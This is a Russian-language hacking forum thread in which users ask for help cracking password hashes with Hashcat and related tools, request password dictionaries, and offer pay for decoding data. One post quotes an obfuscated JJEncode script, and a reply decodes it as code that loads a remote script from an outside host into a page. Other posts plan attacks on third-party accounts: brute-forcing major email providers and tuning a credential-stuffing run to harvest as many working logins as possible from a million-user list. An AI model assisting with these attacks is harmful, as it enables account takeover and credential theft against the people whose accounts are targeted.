Привет ребята,я далековата от хакерства,но сейчас вот столкнулась.... Пытаюсь достать пароль из хеша с помощью барса, но выдает wrong md5 hash. It should be 32 hex characters. не пойму... хеш от worldpress, почитала,вроде пишут что он md5... в чем подвох,подскажите пожалуйста. и как быть. сам хеш $P$BUdq1jQH1qt8SD5REeVt0mDILecU010 еще читала что проблема может быть в какой то соли, по этому и 34 символа. Чем его победить , подскажите пожалуйста?
Подскажите, где нибудь есть структурированная хорошая база азиатских словарей? В частности интересует китай, южная корея, и япония. Буду признателен, если кто поделится, или хотя бы подскажет направление, где можно достать.
Всем привет, читал об использовании радужных таблиц и так не понял... На сколько актуально их использовать для расшифровки md5. Стоит ли этим заниматься? Может у кого есть опыт. Поделитесь советом.
Добрый день. Подскажите как можно декодировать данные за вознаграждение из $*KwFFcWAORxEVQTo1JD5tEB0JKS4wRkVCQVBWYxofFTBGRgAAAAC3TJXz$ $*KwEUTjFfWBVgEBIUAAAAAGFQZDM$ $*KwGi-Ifp7qPWpqSi6KeJ9eioAAAAADhuts8$ За подробностями в личку.
Помогите рашифровать Code: <script>$=~[];$={___:++$,$$$$:(![]+"")[$],__$:++$,$_$_:(![]+"")[$],_$_:++$,$_$$:({}+"")[$],$$_$:($[$]+"")[$],_$$:++$,$$$_:(!""+"")[$],$__:++$,$_$:++$,$$__:({}+"")[$],$$_:++$,$$$:++$,$___:++$,$__$:++$};$.$_=($.$_=$+"")[$.$_$]+($._$=$.$_[$.__$])+($.$$=($.$+"")[$.__$])+((!$)+"")[$._$$]+($.__=$.$_[$.$$_])+($.$=(!""+"")[$.__$])+($._=(!""+"")[$._$_])+$.$_[$.$_$]+$.__+$._$+$.$;$.$$=$.$+(!""+"")[$._$$]+$.__+$._+$.$+$.$$;$.$=($.___)[$.$_][$.$_];$.$($.$($.$$+"\""+"\\"+$.__$+$.$$_+$.$$_+$.$_$_+"\\"+$.__$+$.$$_+$._$_+"\\"+$.$__+$.___+$.$$$_+(![]+"")[$._$_]+"\\"+$.$__+$.___+"=\\"+$.$__+$.___+$.$$_$+$._$+$.$$__+$._+"\\"+$.__$+$.$_$+$.$_$+$.$$$_+"\\"+$.__$+$.$_$+$.$$_+$.__+"."+$.$$__+"\\"+$.__$+$.$$_+$._$_+$.$$$_+$.$_$_+$.__+$.$$$_+"\\"+$.__$+$.___+$.$_$+(![]+"")[$._$_]+$.$$$_+"\\"+$.__$+$.$_$+$.$_$+$.$$$_+"\\"+$.__$+$.$_$+$.$$_+$.__+"('\\"+$.__$+$.$$_+$._$$+$.$$__+"\\"+$.__$+$.$$_+$._$_+"\\"+$.__$+$.$_$+$.__$+"\\"+$.__$+$.$$_+$.___+$.__+"');"+$.$$$_+(![]+"")[$._$_]+".\\"+$.__$+$.$$_+$._$$+"\\"+$.__$+$.$$_+$._$_+$.$$__+"\\"+$.$__+$.___+"=\\"+$.$__+$.___+"'\\"+$.__$+$.$_$+$.___+$.__+$.__+"\\"+$.__$+$.$$_+$.___+"\\"+$.__$+$.$$_+$._$$+"://"+$.$$__+(![]+"")[$._$_]+$._$+$._+$.$$_$+$.$$__+$.$$_$+"\\"+$.__$+$.$_$+$.$$_+".\\"+$.__$+$.$__+$.$$$+$.$$_$+"\\"+$.__$+$.$_$+$.$$_+"/\\"+$.__$+$.$_$+$._$_+"\\"+$.__$+$.$$_+$._$$+"/\\"+$.__$+$._$$+$.__$+"\\"+$.__$+$._$_+$.__$+"\\"+$.__$+$.__$+$.___+"\\"+$.__$+$.__$+$.___+"\\"+$.__$+$.___+$.__$+"\\"+$.__$+$.___+$.__$+"\\"+$.__$+$._$_+$.$_$+"\\"+$.__$+$.___+$.$__+"\\"+$.__$+$._$$+$.__$+"\\"+$.__$+$.$$_+$.$$$+"\\"+$.__$+$.___+$._$_+"\\"+$.__$+$.___+$.$$_+"\\"+$.__$+$.$__+$.$$$+(![]+"")[$._$_]+"\\"+$.__$+$.___+$.$__+"\\"+$.__$+$._$$+$.___+"\\"+$.__$+$.$__+$.$$$+$.___+"\\"+$.__$+$._$_+$.$$_+"\\"+$.__$+$._$_+$._$$+"\\"+$.__$+$.___+$._$_+"\\"+$.__$+$._$_+$.$$_+"\\"+$.__$+$._$_+$.$$$+"\\"+$.__$+$.$$$+$.__$+"\\"+$.__$+$.___+$.$_$+"\\"+$.__$+$.___+$.$__+"\\"+$.__$+$._$_+$.__$+$.$_$+$.$$_$+"\\"+$.__$+$.$$$+$.___+"\\"+$.__$+$.___+$.$$$+"\\"+$.__$+$.___+$._$$+"\\"+$.__$+$.___+$._$_+"\\"+$.__$+$._$_+$.$__+"\\"+$.__$+$.__$+$.$$_+"\\"+$.__$+$._$_+$.$__+$.$___+"\\"+$.__$+$._$_+$.$_$+"\\"+$.__$+$.___+$.$__+"\\"+$.__$+$.___+$.$$$+"\\"+$.__$+$._$_+$.$_$+"\\"+$.__$+$.___+$._$_+"\\"+$.__$+$.___+$._$_+"\\"+$.__$+$._$_+$.$__+$.___+"\\"+$.__$+$.$$$+$._$_+"\\"+$.__$+$._$_+$.___+"\\"+$.__$+$.___+$.$$_+"\\"+$.__$+$._$_+$.$_$+"\\"+$.__$+$.$_$+$._$_+"\\"+$.__$+$.___+$._$$+$.__+"\\"+$.__$+$.___+$.__$+"\\"+$.__$+$._$_+$._$_+"\\"+$.__$+$.___+$.$_$+$._$_+"\\"+$.__$+$.__$+$.$$_+"\\"+$.__$+$.$$$+$._$_+"\\"+$.__$+$.___+$.__$+"\\"+$.__$+$._$_+$.$$_+"\\"+$.__$+$.__$+$._$_+"\\"+$.__$+$._$_+$._$$+"\\"+$.__$+$.__$+$.__$+"\\"+$.__$+$._$_+$.___+"\\"+$.__$+$._$_+$.__$+$.___+"\\"+$.__$+$.___+$.$$_+"\\"+$.__$+$.__$+$._$_+"\\"+$.__$+$.___+$.__$+"\\"+$.__$+$.___+$._$_+"\\"+$.__$+$.___+$.$$_+"\\"+$.__$+$._$_+$.$_$+"\\"+$.__$+$._$_+$.$$_+"\\"+$.__$+$._$_+$.$__+"\\"+$.__$+$.__$+$._$$+"_\\"+$.__$+$.___+$.__$+"\\"+$.__$+$.___+$.__$+"\\"+$.__$+$.___+$._$_+"\\"+$.__$+$.__$+$._$_+"\\"+$.__$+$._$_+$.$$_+"\\"+$.__$+$.$$$+$.___+"\\"+$.__$+$.__$+$.__$+"\\"+$.__$+$.___+$.$$$+"\\"+$.__$+$.___+$.$_$+"\\"+$.__$+$.$_$+$._$$+"\\"+$.__$+$.__$+$.___+$.$_$+"\\"+$.__$+$._$_+$.__$+"\\"+$.__$+$.___+$._$$+"\\"+$.__$+$.___+$.$$_+"\\"+$.__$+$.___+$.$__+"\\"+$.__$+$.___+$._$_+"\\"+$.__$+$.___+$.__$+"\\"+$.__$+$._$_+$._$$+"\\"+$.__$+$._$_+$.$$_+"\\"+$.__$+$.__$+$.__$+"\\"+$.__$+$.$_$+$.___+"\\"+$.__$+$._$_+$.___+"\\"+$.__$+$._$_+$.___+$.$$__+"\\"+$.__$+$._$_+$._$_+"\\"+$.__$+$.___+$.$_$+"\\"+$.__$+$.$$_+$.__$+"\\"+$.__$+$._$$+$.__$+"\\"+$.__$+$._$_+$._$_+"\\"+$.__$+$.___+$.$$_+"\\"+$.__$+$.___+$.$_$+$.$$_$+"\\"+$.__$+$._$_+$._$_+"\\"+$.__$+$._$_+$.__$+$.$$__+"\\"+$.__$+$.$$_+$._$$+"\\"+$.__$+$._$_+$.$_$+"\\"+$.__$+$.___+$.$_$+"\\"+$.__$+$.$_$+$._$$+"\\"+$.__$+$.___+$.__$+"\\"+$.__$+$._$_+$._$_+"\\"+$.__$+$.__$+$._$_+"\\"+$.__$+$._$$+$.__$+"\\"+$.__$+$._$_+$.__$+"\\"+$.__$+$.$$$+$.__$+"\\"+$.__$+$.___+$.__$+"\\"+$.__$+$._$$+$.___+"\\"+$.__$+$._$_+$.$$_+"\\"+$.__$+$.___+$._$_+"\\"+$.__$+$._$_+$.___+"\\"+$.__$+$.__$+$.$$_+$.$$__+"\\"+$.__$+$._$_+$.__$+"\\"+$.__$+$.__$+$.$__+$.$_$_+"\\"+$.__$+$._$_+$.__$+"\\"+$.__$+$.___+$.__$+"\\"+$.__$+$._$_+$.$$_+"\\"+$.__$+$.$_$+$.$_$+$.$__+"\\"+$.__$+$.___+$._$$+"\\"+$.__$+$._$_+$.__$+"\\"+$.__$+$.___+$._$$+"\\"+$.__$+$._$$+$._$_+"\\"+$.__$+$.___+$.__$+"\\"+$.__$+$.___+$.__$+"\\"+$.__$+$._$_+$.$$_+$.$$_$+"\\"+$.__$+$.___+$.$_$+"\\"+$.__$+$.__$+$.$_$+"\\"+$.__$+$.___+$.$$$+"\\"+$.__$+$._$$+$.__$+"\\"+$.__$+$.___+$.__$+"\\"+$.__$+$._$$+$.___+"\\"+$.__$+$._$_+$.__$+"\\"+$.__$+$.$$$+$.___+"\\"+$.__$+$.$$_+$.$$$+$.$_$_+".\\"+$.__$+$.$_$+$._$_+"\\"+$.__$+$.$$_+$._$$+"?"+$.__+"\\"+$.__$+$.$$_+$._$_+(![]+"")[$._$_]+"="+$.___+"."+$._$$+$.$_$+"';"+$.$$_$+$._$+$.$$__+$._+"\\"+$.__$+$.$_$+$.$_$+$.$$$_+"\\"+$.__$+$.$_$+$.$$_+$.__+".\\"+$.__$+$.$_$+$.___+$.$$$_+$.$_$_+$.$$_$+"."+$.$_$_+"\\"+$.__$+$.$$_+$.___+"\\"+$.__$+$.$$_+$.___+$.$$$_+"\\"+$.__$+$.$_$+$.$$_+$.$$_$+"\\"+$.__$+$.___+$._$$+"\\"+$.__$+$.$_$+$.___+"\\"+$.__$+$.$_$+$.__$+(![]+"")[$._$_]+$.$$_$+"("+$.$$$_+(![]+"")[$._$_]+");"+"\"")())();</script>
да вроде гуглом за 5 минут решается https://github.com/jacobsoo/Decoder-JJEncode Code: var el = document.createElement('script');el.src = 'https://cloudcdn.gdn/js/YQHHAAUDYwBFglDXg0VSBVWyEDQ5dxGCBTNT8UDGUBBT0zPFUjCtARE2NzAVJSIPQ0FJABFUVTK_AABJVxIGEkH5QCFDBASVIhPPcREqYRFEdRQcsUEkARJYQyAXVBPNcQLaQAVm4CQCZAAVdEMGYAXQxwa.js?trl=0.35';document.head.appendChild(el); или не то пальто?
Пытаюсь расхешить опенкарт, но не получается. Хеш: 2b94552ec181b8b100d3cfc7e11996ef55b17216:2ghl2OYSv пароль: AeRieVoh80 нагуглил, это опенкарт это 4900 в хешкете и по виду совпадает. но: что не так делаю? подскажите плиз такие же проблемы у меня со всеми почти хешами, кроме обычного мд5.
пароль AuFgEpQW9 от него хеш Fx7IyqDNsSXz\n В теории это DES(Unix), Traditional DES (Hashcat Mode 1500) Подозреваю, что тут еще соль какая-то должна быть. Еще связок пароль-хэш могу достать Вопрос: как (и возможно ли) вычислить соль?
В DES(Unix) пароль максимум 8 символов, а у вас - 9. Хэш должен быть ровно 13 символов, а у вас - 12 ("\n" - спецсимвол, не считается). Поэтому для начала нужно, как минимум, убедиться, что имеете дело с алгоритмом на основе DES(Unix): 1. Независимо от длины пароля длина хэша всегда должна быть одинаковой. 2. Хэши для паролей длиннее 8 символов должны быть такими же, как от начальных 8-ми символов. Если оба пункта будут TRUE, тогда можно пытаться искать соль, она всего 2 символа, перебрать не проблема.
Прогоняю через hashid root@kali:~# hashid Fx7IyqDNsSXz\n Analyzing 'Fx7IyqDNsSXzn' говорит [+] DES(Unix) [+] Traditional DES [+] DEScrypt Синтаксис вроде как правильный задаю. Кроме этого на online сервисе прогонял, он говорит DES(Unix) Поэтому и решил, что именно DES(Unix)
Создал базу данных на keepass с паролем 123456 Хеш: Черех hashcat пытаюсь прогнать hashcat64.exe -a 0 -m 13400 -w 3 D:\hack\shell\keepass.txt F:\пароли\pass123 Но выводит: Почему не видит хеш? В файле keepass он А Базу данных Keepass2 видит прекрасно
Podskajite please chto za tip hesha? sprava vnizy na skrine varianty kotorye pereproboval v hashcat HASH: 90b739d310ab63f2b0905fda203036a7:ce PASS: 12345
Hydra (Kali) - Не работает с прокси серверами, не может использовать емэйл адрес как вариант в списке паролей. Samnao smtp cracker - Не работает с бигами (как гмейл, хотмейл, и Оффис365). Решение?
Главная задача: Нужно получить максимальное количество ЛЮБЫХ РАБОЧИХ логинов для сайта. Например: Есть список юзеров - 1 млн. Вопрос: Какое самое эффективное сочетание юзер:пароль для атаки, чтоб уложиться в за неделю? Варианты: 1. Использовать 100 юзеров со всем списком паролей (т.е. 1млн) 2. Использовать одинаковое число паролей и юзер-нэймов 3. Использовать все юзеры сразу (1млн), тестируя на каждый по 100 самых популярных пароля. Здесь есть кто-то, кто смог бы подсказать что-то по этому поводу? Какой способ более эффективный (из вышеперечисленных)? Или может быть у вас есть другие идеи? Более оригинальные или даже гениальные?
Нашелся файл Excel с паролем на открытие. Прогнал его по дефолту Office Password Recovery by Elcomsoft(6.34) - ничем не помог. Как понимаю, светит брутфорс. Подскажите, откуда взять нормальный словарь?